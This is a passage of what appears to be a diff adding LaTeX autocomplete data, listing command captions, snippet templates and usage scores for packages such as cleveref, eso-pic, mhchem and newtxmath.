'\\expandafter', + snippet: '\\expandafter', + meta: 'cleveref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'cleveref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\crefmultiformat{}{}', + snippet: '\\crefmultiformat{$1}{$2}', + meta: 'cleveref-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\crefformat{}{}', + snippet: '\\crefformat{$1}{$2}', + meta: 'cleveref-cmd', + score: 0.0006776840671975755, + }, + { + caption: '\\Cref{}', + snippet: '\\Cref{$1}', + meta: 'cleveref-cmd', + score: 0.0016649686371949341, + }, + { + caption: '\\refstepcounter{}', + snippet: '\\refstepcounter{$1}', + meta: 'cleveref-cmd', + score: 0.002140559856649122, + }, + { + caption: '\\cref{}', + snippet: '\\cref{$1}', + meta: 'cleveref-cmd', + score: 0.0159491058092361, + }, + { + caption: '\\crefrangeconjunction', + snippet: '\\crefrangeconjunction', + meta: 'cleveref-cmd', + score: 3.2405622997778076e-6, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'cleveref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\creflabelformat{}{}', + snippet: '\\creflabelformat{$1}{$2}', + meta: 'cleveref-cmd', + score: 0.000997031755478214, + }, + { + caption: '\\Crefname{}{}{}', + snippet: '\\Crefname{$1}{$2}{$3}', + meta: 'cleveref-cmd', + score: 0.000239288793927364, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'cleveref-cmd', + score: 1.897791904799601, + }, + { + caption: '\\labelcref{}', + snippet: '\\labelcref{$1}', + meta: 'cleveref-cmd', + score: 6.720807249600364e-5, + }, + { + caption: '\\creflastconjunction', + snippet: '\\creflastconjunction', + meta: 'cleveref-cmd', + score: 3.2405622997778076e-6, + }, + ], + 'eso-pic': [ + { + caption: '\\AddToShipoutPictureFG{}', + snippet: '\\AddToShipoutPictureFG{$1}', + meta: 'eso-pic-cmd', + score: 0.000325977535138643, + }, + { + caption: '\\AddToShipoutPictureBG{}', + snippet: '\\AddToShipoutPictureBG{$1}', + meta: 'eso-pic-cmd', + score: 0.0008957666085644653, + }, + { + caption: '\\AtPageUpperLeft{}', + snippet: '\\AtPageUpperLeft{$1}', + meta: 'eso-pic-cmd', + score: 0.0003608141410278152, + }, + { + caption: '\\LenToUnit{}', + snippet: '\\LenToUnit{$1}', + meta: 'eso-pic-cmd', + score: 0.0007216282820556304, + }, + { + caption: '\\AddToShipoutPicture{}', + snippet: '\\AddToShipoutPicture{$1}', + meta: 'eso-pic-cmd', + score: 0.0017658629469099734, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'eso-pic-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'eso-pic-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'eso-pic-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'eso-pic-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\AtBeginShipout{}', + snippet: '\\AtBeginShipout{$1}', + meta: 'eso-pic-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\AtBeginShipoutNext{}', + snippet: '\\AtBeginShipoutNext{$1}', + meta: 'eso-pic-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'eso-pic-cmd', + score: 0.008565354665444157, + }, + ], + mhchem: [ + { + caption: '\\ce{}', + snippet: '\\ce{$1}', + meta: 'mhchem-cmd', + score: 0.04246600383063094, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'mhchem-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'mhchem-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'mhchem-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'mhchem-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'mhchem-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'mhchem-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'mhchem-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'mhchem-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mhchem-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'mhchem-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'mhchem-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'mhchem-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'mhchem-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'mhchem-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'mhchem-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'mhchem-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'mhchem-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'mhchem-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'mhchem-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'mhchem-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'mhchem-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'mhchem-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'mhchem-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'mhchem-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'mhchem-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'mhchem-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'mhchem-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'mhchem-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'mhchem-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'mhchem-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'mhchem-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'mhchem-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'mhchem-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'mhchem-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'mhchem-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'mhchem-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'mhchem-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'mhchem-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'mhchem-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'mhchem-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'mhchem-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'mhchem-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'mhchem-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'mhchem-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'mhchem-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'mhchem-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'mhchem-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'mhchem-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'mhchem-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'mhchem-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'mhchem-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'mhchem-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'mhchem-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'mhchem-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'mhchem-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'mhchem-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'mhchem-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'mhchem-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'mhchem-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'mhchem-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'mhchem-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'mhchem-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'mhchem-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'mhchem-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'mhchem-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'mhchem-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'mhchem-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'mhchem-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'mhchem-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'mhchem-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'mhchem-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'mhchem-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'mhchem-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'mhchem-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'mhchem-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'mhchem-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'mhchem-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'mhchem-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'mhchem-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'mhchem-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'mhchem-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'mhchem-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'mhchem-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'mhchem-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'mhchem-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'mhchem-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'mhchem-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'mhchem-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'mhchem-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'mhchem-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'mhchem-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'mhchem-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'mhchem-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'mhchem-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'mhchem-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'mhchem-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'mhchem-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'mhchem-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'mhchem-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'mhchem-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'mhchem-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'mhchem-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'mhchem-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'mhchem-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'mhchem-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'mhchem-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'mhchem-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'mhchem-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'mhchem-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'mhchem-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'mhchem-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'mhchem-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'mhchem-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'mhchem-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'mhchem-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'mhchem-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'mhchem-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'mhchem-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'mhchem-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'mhchem-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'mhchem-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'mhchem-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'mhchem-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'mhchem-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'mhchem-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'mhchem-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'mhchem-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'mhchem-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'mhchem-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'mhchem-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'mhchem-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'mhchem-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'mhchem-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'mhchem-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'mhchem-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'mhchem-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'mhchem-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'mhchem-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'mhchem-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'mhchem-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'mhchem-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'mhchem-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'mhchem-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'mhchem-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'mhchem-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'mhchem-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'mhchem-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'mhchem-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'mhchem-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'mhchem-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'mhchem-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'mhchem-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'mhchem-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'mhchem-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'mhchem-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'mhchem-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'mhchem-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'mhchem-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mhchem-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'mhchem-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'mhchem-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'mhchem-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'mhchem-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'mhchem-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'mhchem-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'mhchem-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'mhchem-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'mhchem-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'mhchem-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mhchem-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'mhchem-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'mhchem-cmd', + score: 0.0063276692758974925, + }, + ], + amscd: [ + { + caption: '\\tag{}', + snippet: '\\tag{$1}', + meta: 'amscd-cmd', + score: 0.00784357461002059, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'amscd-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'amscd-cmd', + score: 0.0063276692758974925, + }, + ], + 'unicode-math': [ + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'unicode-math-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'unicode-math-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'unicode-math-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'unicode-math-cmd', + score: 0.2864294797053033, + }, + ], + ifxetex: [ + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'ifxetex-cmd', + score: 0.00021116765384691477, + }, + ], + newtxmath: [ + { + caption: '\\int', + snippet: '\\int', + meta: 'newtxmath-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\sqrt{}', + snippet: '\\sqrt{$1}', + meta: 'newtxmath-cmd', + score: 0.20240160977404634, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'newtxmath-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\hbar', + snippet: '\\hbar', + meta: 'newtxmath-cmd', + score: 0.024733493787737763, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'newtxmath-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\surd', + snippet: '\\surd', + meta: 'newtxmath-cmd', + score: 0.002159694087964359, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'newtxmath-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'newtxmath-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'newtxmath-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'newtxmath-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\vdots', + snippet: '\\vdots', + meta: 'newtxmath-cmd', + score: 0.03669355896719803, + }, + { + caption: '\\ddots', + snippet: '\\ddots', + meta: 'newtxmath-cmd', + score: 0.010831382784078964, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'newtxmath-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'newtxmath-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'newtxmath-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'newtxmath-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'newtxmath-cmd', + score: 